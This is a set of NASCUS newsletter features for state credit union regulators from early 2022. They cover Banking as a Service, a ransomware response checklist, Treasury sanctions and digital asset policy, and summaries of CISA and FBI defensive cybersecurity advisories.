Members also discussed the impacts, benefits, and challenges associated with Banking as a Service (BaaS) with Dr. Lamont Black. Including a clarification of terms and applications of this growing sector, “BaaS is a model in which chartered banks or credit unions integrate their digital banking services directly into the products of other non-bank businesses.”

While BaaS benefits include reducing IT costs, improved consumer experiences, and fee-based income, challenges include being characterized as “rent-a-charter” entities and giving consumer relationships to third-party providers – not the credit union. Another vital consideration, third-parties rely on partner financial institutions for regulatory management. Regulators and credit unions need to carefully weigh the implications for Field of Membership as third-party consumers are not always members of the credit union.

Breaches and Ransomware

“Ransomware-related data breaches have doubled in each of the past two years. At the current growth rate, ransomware attacks will pass phishing as the number one root cause of data compromises in 2022.”

As a result, cybersecurity and ransomware issues are top of mind for most supervisory agencies with some stating a ransomware attack would be their “worst nightmare.” Particularly with the heightened tensions around Ukraine, agencies are closely examining the cybersecurity landscape, including changes to cybersecurity reporting rules. At the current time, only a handful of agencies have dedicated cyber experts, while others are in the process of securing a dedicated position.

With the average ransomware payment nearing $350K, NASCUS brought in speakers CUNA Mutual Group’s Carlos Molina and Derek Laczniak, Director of Cyber Liability, M3 Insurance, to discuss the effects of ransomware on the industry. One of the most compelling segments of the presentation covered a “checklist of things to know” when responding to a ransomware attack. This includes:

  1. Know who is on your incident response team.
  2. Have multiple forms of communication available.
  3. Be prepared to make decisions about voluntarily taking systems offline.
  4. Be prepared with an internal communication plan.
  5. Do not allow employees to reach out to the threat actor themselves.
  6. You’ll be asked to sign two agreement letters within the first 24 hours.
  7. You do not need to have your own cryptocurrency on hand.
  8. You need underwriting approval to pay a ransom.
  9. Know your backups and understand that they are not always the answer.
  10. Think about whom the organization needs to tell and when.

Additionally, state supervisors discussed in-depth perspectives over the following: 

  • The need to retain, recruit, and replenish staff. With unemployment levels low in many states and the complication of virtual workplace demands from potential recruits, agencies struggle to be competitive and hire talented staff. This experience is common throughout the industry; as more and more Baby Boomers meet retirement, agencies are working to fill the shoes of seasoned staff in hybrid workplaces.
  • Challenges within the real estate market. The pandemic has altered how employees view the modern workspace, and many employees are moving out of city centers requiring companies to rethink commercial spacing needs as part of their cost-benefit analysis. Additionally, some expressed concerns over a potential housing bubble given market changes spurred by the pandemic.
  • A rise in credit unions mergers. Succession plan issues have been a strong driver for mergers in several states, with ‘one in three credit unions citing a lack of a succession plan’ as the main reason driving a merger.
  • Wide spectrum of overlapping topics. The regulatory world is a complex environment and the National Meeting provided a platform for synergy on field of membership reform, interstate branching, CUSO advancements in FinTechs, and more.

Looking Ahead

As we move into the future, attendees noted sensitivities to other potential bubbles, including delinquencies. While delinquencies have been flat throughout the pandemic, supervisors are concerned with credit quality, student and auto loans, in addition to net-worth ratios.

Events such as these are essential to the state system, as they provide a stage for discovery, extensive issue remediation, and collaboration. NASCUS offers several more collaborative learning opportunities, including the 2022 Cannabis Symposium, S3: State System Summit, Directors’ Colleges, and more.

Click here to find an event near you.

 


April 8, 2022, Feature: A Rousing Week at Treasury

This week, Secretary of the Treasury, Janet L. Yellen not only testified before the U.S. House Financial Services Committee to “discuss Treasury’s oversight of the International Financial Institutions (IFIs) and our role in promoting inclusive and sustainable growth, global monetary and financial stability, and development,” Treasury escalated sanctions on Russia, including Russian-based Hydra, World’s Largest Darknet Market, and Ransomware-Enabling Virtual Currency Exchange Garantex and made an official statement on potential policies and regulations around digital assets.

Tuesday, The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned the world’s largest and most prominent darknet market, Hydra Market (Hydra), in a coordinated international effort to disrupt the proliferation of malicious cybercrime services, dangerous drugs, and other illegal offerings available through the Russia-based site. The operation targeting Hydra was a collaborative initiative joined by the U.S. Department of Justice, Federal Bureau of Investigations, Drug Enforcement Administration, Internal Revenue Service Criminal Investigation, and Homeland Security Investigations. This action was enhanced by international cooperation with the German Federal Criminal Police, who today shut down Hydra servers in Germany and seized $25 million worth of bitcoin.

By Wednesday, Treasury has escalated the sanctions, targeting critical arteries of the Russian Federation economy, fully blocking the largest public and private banks, and imposing new sanctions on Putin’s Family and architects of war in response to Russia’s continued brutal war against Ukraine and atrocities against Ukrainian citizens. Treasury imposed full blocking sanctions on Sberbank, Russia’s largest state-owned bank, and Alfa-Bank, Russia’s largest private bank. Treasury also targeted family members of President Vladimir Putin (Putin) and Foreign Minster Sergey Lavrov (Lavrov), as well as Russian Security Council members who are complicit in the war against Ukraine.

Then, in a statement delivered Thursday to the American University’s Kogod School of Business Center for Innovation, Secretary Yellen closed out a busy week of activities with a statement on digital assets policy and remarking that crypto-asset regulations should support responsible innovation while managing risks.

Yellen commented that in many cases regulators already have authorities that can manage crypto risks and provide appropriate oversight of new types of intermediaries such as digital asset exchanges. “Our regulatory frameworks should be designed to support responsible innovation while managing risks – especially those that could disrupt the financial system and economy,” Yellen commented.

As banks and other traditional financial firms become more involved in digital asset markets, regulatory frameworks will need to appropriately reflect the risks of these new activities,” she said.

Within her remarks, Yellen shared 5 lessons to apply when navigating the challenges and opportunities associated with emerging technologies.

1. Our financial system benefits from responsible innovation
Although new technologies have made our financial system more efficient for most Americans, many transactions still take too long to settle. A combination of technological factors and business incentives have produced a common frustrating experience shared by tens of millions of Americans every week: their employer sends their paycheck, but it takes up to two days for the check to hit their bank account.

Proponents of digital assets envision a more efficient payment system with instantaneous transactions and lower costs no matter where you live. Under the Executive Order, the Administration will publish a report on the future of money and payments. The report will analyze possible design choices related to a potential Central Bank Digital Currency (CBDC) and implications for payment systems, economic growth, financial stability, financial inclusion, and national security.

2. When regulation fails to keep pace with innovation, vulnerable people often suffer the greatest harm
We learned this painful lesson during the Global Financial Crisis. Financial institutions called “shadow banks” and an explosion of new financial products allowed dangerous levels of risks to accumulate. Stablecoins raise policy concerns, including those related to illicit finance, user protection, and systemic risk. And, they are currently subject to inconsistent and fragmented oversight.

Of course, stablecoins are just one piece of a much larger ecosystem of digital assets. Our regulatory frameworks should be designed to support responsible innovation while managing risks – especially those that could disrupt the financial system and economy. As banks and other traditional financial firms become more involved in digital asset markets, regulatory frameworks will need to appropriately reflect the risks of these new activities. And, new types of intermediaries, such as digital asset exchanges and other digital native intermediaries, should be subject to appropriate forms of oversight.

3. Regulation should be based on risks and activities, not specific technologies
When new technologies enable new activities, products, and services, financial regulations need to adjust. But, that process should be guided by the risks associated with the services provided to households and businesses, not the underlying technology.

Wherever possible, regulation should be “tech neutral.” For example, consumers, investors, and businesses should be protected from fraud and misleading statements regardless of whether assets are stored on a balance sheet or distributed ledger. Similarly, firms that hold customer assets should be required to ensure those assets are not lost, stolen, or used without the customer’s permission. And, taxpayers should receive the same type of tax reporting on digital asset transactions that they receive for transactions in stocks and bonds, so that they have the information they need to report their income to the IRS.

To the extent there are gaps, we will make policy recommendations, including assessment of potential regulatory actions and legislative changes. Continuing to update and improve our regulatory architecture will support US economic competitiveness and reinforce leadership in the global financial system.

4. Sovereign money is the core of a well-functioning financial system and the US benefits from the central role the dollar and US financial institutions play in global finance
The development of our currency to its current form has been a dynamic process that took place over centuries. Today, monetary sovereignty and uniform currency have brought clear benefits for economic growth and stability. Our approach to digital assets must be guided by the appreciation of those benefits. Some have suggested a CBDC could be the next evolution in our currency. We need to consider these important questions in the context of the central role the dollar plays in the world economy.

The dollar’s international prominence is strongly supported by US institutions and policies; US economic performance; open, deep and liquid financial markets; rule of law; and a commitment to a free-floating currency. The President’s Executive Order asks us to consider whether and how the issuance of a public CBDC would support this role…I don’t yet know the conclusions we will reach, but we must be clear that issuing a CBDC would likely present a major design and engineering challenge that would require years of development, not months.

As we consider these big choices, we must also remember that technology-driven financial innovation is inherently cross-border and requires international cooperation.

5. We need to work together to ensure responsible innovation
Many of the most groundbreaking innovations in our history have involved all of us: policymakers and businesspeople, advocates, scholars, inventors, and citizens. People have a wide range of views when it comes to digital assets. On one hand, some proponents speak as if the technology is so radically and beneficially transformative that the government should step back completely and let innovation take its course. On the other hand, skeptics see limited, if any, value in this technology and associated products and advocate that the government take a much more restrictive approach. Such divergence of perspectives has often been associated with new and transformative technologies.

Additional Resources/Links to full statements

 


March 25, 2022, Feature: How Are State Agencies Preparing in the Cyber Space?

This week, the White House issued a fact sheet regarding potential cyberattacks resulting from “evolving intelligence” around the Russia/Ukraine situation. Additionally, the President echoed concerns regarding the potential for Russian cyberattacks and directed companies to “harden your cyber defenses immediately.”

This step follows actions taken by several Governors across the country to take proactive steps in safeguarding against potential attacks, including

  • New York Gov. Kathy Hochul commented that her state was “on heightened alert with respect to cybersecurity and our own defenses.” Additionally, New York launched a Joint Security Operations Center to improve coordination and bolster cybersecurity efforts by bringing federal, state, county, and local governments, together with critical infrastructure partners.
  • Colorado Gov. Jared Polis directed the Office of Information Technology to focus on protecting the state’s critical infrastructure from Russian cyberattacks or misinformation efforts through an executive order
  • North Carolina Gov. Roy Cooper instructed the Joint Cybersecurity Task Force to increase outreach and assistance. 
  • Texas Gov. Greg Abbott ordered state IT and public safety officials to “make sure cyber incident response teams are ready and that a potential cyber intrusion can be quickly detected through antivirus and other software.”
  • In an interview with Stateline Connecticut, Chief Information Security Officer Jeff Brown commented that the state has been “very aggressively” blocking Russian IP addresses. 

While state governments have not received any credible threats to date, state executives are focused on ensuring proper procedures to protect state systems and the public.

Published in a recent article by the Pew Charitable Trust. titled “Ukraine War Puts US Cities, States on Cyber Alert”:

“Since Russia’s attack on Ukraine, the Multi-State Information Sharing and Analysis Center, a federally funded group that helps state and local governments prevent and respond to digital threats, also has boosted its efforts, said Randy Rose, a senior director. The group sent information to every state about ways to take defensive actions.

But states shouldn’t just focus on Russia, Rose noted, because other cybercriminals and “state actors” may attempt to take advantage of the increased focus on Russia “to slip in unnoticed.”


What Can You Do Today?

Together, the FBI and Cybersecurity and Infrastructure Security Agency issued a joint Cybersecurity Advisory  that provides information malware “as well as open-source indicators of compromise (IOCs) for organizations to detect and prevent the malware.”

Actions to Take Today:

  • Set antivirus and antimalware programs to conduct regular scans.
  • Enable strong spam filters to prevent phishing emails from reaching end users.
  • Filter network traffic.
  • Update software.
  • Require multifactor authentication.

Furthermore, the U.S. Cybersecurity and Infrastructure Security Agency has issued a “Shields Up” warning about this evolving threat. Advising every organization, including state and local governments, to “adopt a heightened posture” and be prepared to respond to disruptive cyber activity.

Stay Up-to-date on Cyber Alerts and Resources

Additional Reading/Resources

 

NASCUS Report March 4, 2022, Feature: Global Cybersecurity Awareness

Highlights necessary cyber alerts/awareness as the entire cybersecurity community is on high alert following events in Ukraine. Links curated for this week include:

 


 

CISA and FBI Publish Advisory to Protect Organizations from Destructive Malware Used in Ukraine

February 26, 2022 — The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) issued a joint Cybersecurity Advisory today providing an overview of destructive malware that has been used to target organizations in Ukraine as well as guidance on how organizations can detect and protect their networks. The joint Advisory, “Destructive Malware Targeting Organizations in Ukraine,” provides information on WhisperGate and HermeticWiper malware, both used to target organizations in Ukraine.

Destructive malware can present a direct threat to an organization’s daily operations, impacting the availability of critical assets and data. While there is no specific, credible threat to the United States at this time, all organizations should assess and bolster their cybersecurity. Some immediate actions that can be taken to strengthen cyber posture include:

  • Enable multifactor authentication;
  • Set antivirus and antimalware programs to conduct regular scans;
  • Enable strong spam filters to prevent phishing emails from reaching end users;
  • Update software; and
  • Filter network traffic.

“In the wake of continued denial of service and destructive malware attacks affecting Ukraine and other countries in the region, CISA has been working hand-in-hand with our partners to identify and rapidly share information about malware that could threaten the operations of critical infrastructure here in the U.S.,” said CISA Director Jen Easterly. “Our public and private sector partners in the Joint Cyber Defense Collaborative (JCDC), international computer emergency readiness team (CERT) partners, and our long-time friends at the FBI are all working together to help organizations reduce their cyber risk.”

“The FBI alongside our federal partners continues to see malicious cyber activity that is targeting our critical infrastructure sector,” said FBI Cyber Division Assistant Director Bryan Vorndran. “We are striving to disrupt and diminish these threats, however we cannot do this alone, we continue to share information with our public and private sector partners and encourage them to report any suspicious activity. We ask that organizations continue to shore up their systems to prevent any increased impediment in the event of an incident.”

Read more about this advisory here.

Related Article: CISA Adds 95 Known Exploited Vulnerabilities to Catalog
Based on the evidence of active exploitation, these types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose a significant risk to the federal enterprise.


Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks

February 24, 2022 —The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) have observed a group of Iranian government-sponsored advanced persistent threat (APT) actors, known as MuddyWater, conducting cyber espionage and other malicious cyber operations targeting a range of government and private-sector organizations across sectors—including telecommunications, defense, local government, and oil and natural gas—in Asia, Africa, Europe, and North America. Note: MuddyWater is also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros.

MuddyWater is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).[1] This APT group has conducted broad cyber campaigns in support of MOIS objectives since approximately 2018. MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors.

MuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims’ systems and deploy ransomware. These actors also maintain persistence on victim networks via tactics such as side-loading dynamic link libraries (DLLs)—to trick legitimate programs into running malware—and obfuscating PowerShell scripts to hide command and control (C2) functions. FBI, CISA, CNMF, and NCSC-UK have observed MuddyWater actors recently using various malware—variants of PowGoop, Small Sieve, Canopy (also known as Starwhale), Mori, and POWERSTATS—along with other tools as part of their malicious activity.

This advisory provides observed tactics, techniques, and procedures (TTPs); malware; and indicators of compromise (IOCs) associated with this Iranian government-sponsored APT activity to aid organizations in the identification of malicious activity against sensitive networks.

FBI, CISA, CNMF, NCSC-UK, and the National Security Agency (NSA) recommend organizations apply the mitigations in this advisory and review the following resources for additional information. Note: also see the Additional Resources section.

Click here for a PDF version of this report.

 

Related Article: NCUA’s Information Security Examination and Cybersecurity Assessment Program
Includes cyber-based resources such as an automated Cybersecutrity toolbox, an examiner’s guide, National Supervision Policy Manual, and FFIEC IT Booklets.

 


 

February 25, 2022, Featured Story:

CISA Releases New Insight to Help Critical Infrastructure Owners Prepare for and Mitigate Foreign Influence Operations

February 18, 2022 The Cybersecurity and Infrastructure Security Agency (CISA) released a new CISA Insight today, Preparing for and Mitigating Foreign Influence Operations Targeting Critical Infrastructure, which provides critical infrastructure owners and operators with guidance on how to identify and mitigate the risks of influence operations that use mis-, dis-, and malinformation (MDM) narratives.

Recently observed foreign influence operations abroad demonstrate that foreign governments and actors can quickly employ sophisticated influence techniques to target American audiences with the goal of disrupting U.S. critical infrastructure and undermining U.S. interests. This CISA Insight is intended to raise awareness amongst critical infrastructure owners and operators on the risks of such influence operations. The document also outlines steps organizations can take to mitigate the effects of MDM, such as ensuring swift coordination in information sharing and communicating accurate and trusted information to bolster resilience.

“We need to be prepared for the potential of foreign influence operations to negatively impact various aspects of our critical infrastructure with the ongoing Russia-Ukraine geopolitical tensions,” said CISA Director Jen Easterly. “We encourage leaders at every organization to take proactive steps to assess their risks from information manipulation and mitigate the impact of potential foreign influence operations.”

CISA encourages all critical infrastructure owners to identify vulnerabilities, educate staff on proper cyber hygiene, and implement an MDM incident response plan:

  • Designate an individual to oversee the MDM incident response process and associated crisis communications.
  • Establish roles and responsibilities for MDM response, including but responding to media inquiries, issuing public statements, communicating with your staff, and engaging your stakeholder network.
  • Ensure your communication systems are set up to handle incoming questions. Phones, social media accounts, and centralized inboxes should be monitored by multiple people on a rotating schedule to avoid burnout.
  • Identify and train staff on reporting procedures to social media companies, government, and/or law enforcement.
  • Consider your internal coordination channels and processes for identifying incidents, delineating information sharing and response. Foreign actors can combine influence operations with cyber activities, requiring additional coordination to facilitate a whole-of-organization response.

View the CISA Insight here.

Additional Resource: CISA Launches New Catalog of Free Public and Private Sector Cybersecurity Services 

Related Articles


Featured Article in the February 18, 2022 Issue

CISA Issues “Shields Up” Hacking Alert 

February 16, 2022  —  Cyber threats are an issue that every organization faces, from governmental to non-profit and service organizations across the country. Hacking incidents can disrupt company operations, public safety, essential services, and private data. As such, CISA recommends organizations of all sizes “adopt a heightened posture when it comes to cybersecurity and protecting their most critical assets.”

At this time, CISA is monitoring cyber threats associated with the Russian invasion of Ukraine. “While there are not currently any specific credible threats to the U.S. homeland, we are mindful of the potential for the Russian government to consider escalating its destabilizing actions in ways that may impact others outside of Ukraine.”

Based on this situation, CISA recommends all organizations adopt the following actions:

Reduce the likelihood of a damaging cyber intrusion

  • Validate that all remote access to the organization’s network and privileged or administrative access requires multi-factor authentication.
  • Ensure that software is up to date, prioritizing updates that address known exploited vulnerabilities identified by CISA.
  • Confirm that the organization’s IT personnel have disabled all ports and protocols that are not essential for business purposes.
  • If the organization is using cloud services, ensure that IT personnel have reviewed and implemented strong controls outlined in CISA’s guidance.
  • Sign up for CISA’s free cyber hygiene services, including vulnerability scanning, to help reduce exposure to threats.

Take steps to quickly detect a potential intrusion

  • Ensure that cybersecurity/IT personnel are focused on identifying and quickly assessing any unexpected or unusual network behavior. Enable logging in order to better investigate issues or events.
  • Confirm that the organization’s entire network is protected by antivirus/antimalware software and that signatures in these tools are updated.
  • If working with Ukrainian organizations, take extra care to monitor, inspect, and isolate traffic from those organizations; closely review access controls for that traffic.

Ensure that the organization is prepared to respond if an intrusion occurs

  • Designate a crisis-response team with main points of contact for a suspected cybersecurity incident and roles/responsibilities within the organization, including technology, communications, legal, and business continuity.
  • Assure availability of key personnel; identify means to provide surge support for responding to an incident.
  • Conduct a tabletop exercise to ensure that all participants understand their roles during an incident.

Maximize the organization’s resilience to a destructive cyber incident

  • Test backup procedures to ensure that critical data can be rapidly restored if the organization is impacted by ransomware or a destructive cyberattack; ensure that backups are isolated from network connections.
  • If using industrial control systems or operational technology, conduct a test of manual controls to ensure that critical functions remain operable if the organization’s network is unavailable or untrusted.

By implementing the steps above, all organizations can make near-term progress toward improving cybersecurity and resilience. In addition, while recent cyber incidents have not been attributed to specific actors, CISA urges cybersecurity/IT personnel at every organization to review Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure. CISA also recommends organizations visit StopRansomware.gov, a centralized, whole-of-government webpage providing ransomware resources and alerts.


For additional information and resources, click here to visit the Cyber section of NASCUS.org.

Click here to read last week’s feature article on: Appraisal Undervaluations